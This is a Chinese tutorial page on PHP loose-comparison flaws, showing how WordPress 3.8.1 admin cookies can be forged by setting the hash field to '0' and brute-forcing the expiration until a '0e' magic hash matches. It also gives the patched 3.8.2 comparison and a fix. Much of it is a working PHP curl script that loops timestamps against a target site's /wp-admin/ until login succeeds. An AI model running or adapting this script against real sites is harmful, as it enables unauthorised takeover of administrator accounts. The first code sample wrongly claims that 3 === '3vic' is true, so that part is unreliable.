当前位置:Gxlcms > PHP教程 > PHP弱类型:WordPressCookie伪造

PHP弱类型:WordPressCookie伪造

时间:2021-07-01 10:21:17 帮助过:7人阅读

1 PHP弱类型

  PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。

1 php
2$a = 3;
3$b = '3vic';
4var_dump($a == $b);//true5var_dump($a != $b);//false6var_dump($a === $b);//true7var_dump($a !== $b);//false8 ?>

 说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)

2 WordPress代码

  • WordPress 3.8.1 WordPress 3.8.2 部分代码区别

1 php
2// WordPress 3.8.13if ($hmac != $hash) {}
4// WordPress 3.8.25if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) )  {}
6 ?>

  • Cookie 组成

  客户端后台只验证其中的一条Cookie,如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

  其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl) 其中siteurl为WordPress的网址,此处网站地址为http://www.test.ichunqiu,md5加密后为c47f4a97d0321c1980bb76fc00d1e78f,其它部分也可省。

类型      用户名     过期时间        登录成功服务器端赋予客户端的hash值

对应变量$username$expiration$hmac
cookiesadmin1433403595cf50f3b50eed94dd0fdc3d3ea2c7bbb
  • 分析验证登录

  代码 wp-includes/pluggable.php 第543-549行

1 php
2$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
3$hash = hash_hmac('md5', $username . '|' . $expiration, $key);
4if ( $hmac != $hash ) {
5     do_action('auth_cookie_bad_hash', $cookie_elements);
6returnfalse;
7 }

  在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration是可控的,所以我们可以从改变 $expiration 的方法来改变$hash

  • 结合PHP Hash 比较缺陷分析 WordPress

  有以下几种可能使$hmac == $hash 为真,字符串完全相等或者 $hmac 等于0的同时 $hash为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0,然后在if ( $hmac != $hash ) {的上面一行写入var_dump($hmac);die();发现打印出来 $hmac 的结果是 string '0'而不是int 0, 那么有没有方法使字符串识别为整数呢,代码如下:

1 php
2var_dump('0' == '0e156464513131');//true

  其中的 0e156464513131 会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash 以0e开头后面全是数字时就会与 $hmac的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。

3 测试脚本

通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。

 1 php
 2/* 3 4本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
 5传入两个值
 6  WordPress 的主页 $host
 7  管理员用户名     $root
 8*/ 9header("Content-type:text/html;charset=utf-8");
1011$host = 'http://xxx.xxx.xxx';//主页地址 结尾不带'/'12$root = 'user';//管理员用户名1314$url = $host.'/wp-admin/';//后台管理地址    15$sitehash=md5($host); 
1617echo "\nWelcome\n\n";
18//通过时间戳暴力破解cookie 实现伪造cookie19for($i=1500000000;$i<1600000000;$i++){
20$cookie = "wordpress_".$sitehash."=".$root."|".$i."|0;";//组合构造cookie21$header = array(
22        "Content-Type:application/x-www-form-urlencoded",
23       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
24       "Cookie:".$cookie,
25      );
2627$curl = curl_init(); // 启动一个CURL会话    28         curl_setopt($curl, CURLOPT_URL, $url); // 要访问的地址29         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // 使用自动跳转    30         curl_setopt($curl, CURLOPT_AUTOREFERER, 1); // 自动设置Referer    31         curl_setopt($curl, CURLOPT_HTTPGET, true); // 发送一个常规的Post请求    32         curl_setopt($curl, CURLOPT_HTTPHEADER, $header); // 读取上面所储存的Cookie信息         33         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // 获取的信息以文件流的形式返回 34         curl_setopt($curl, CURLOPT_HEADER, false);
35         curl_setopt($curl, CURLOPT_HEADER, 0);   
36         curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);//让curl自动选择版本37$tmpInfo = curl_exec($curl); // 执行操作38if (curl_errno($curl)) {    
39echo 'Errno'.curl_error($curl);    
40        }    
41         curl_close($curl); // 关闭CURL会话
4243        //匹配结果44if(strstr($tmpInfo,'我们准备了几个链接供您开始')){
45echo  "\n".'success : '.$cookie."\n\n";
46break;
47         }else{
48echo  'fail : '.$cookie."\n";
49        }
5051    }
52 ?>    

说明理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 $expiration 几率极低

5 修复方案

  PHP 中使用的哈希比较函数,将其中的 ==!= 分别更改为 ===!== 或者 将比较的两个变量使用MD5再加密一次。

学习笔记:http://ichunqiu.com/course/167

以上就介绍了PHP弱类型:WordPress Cookie伪造,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。

人气教程排行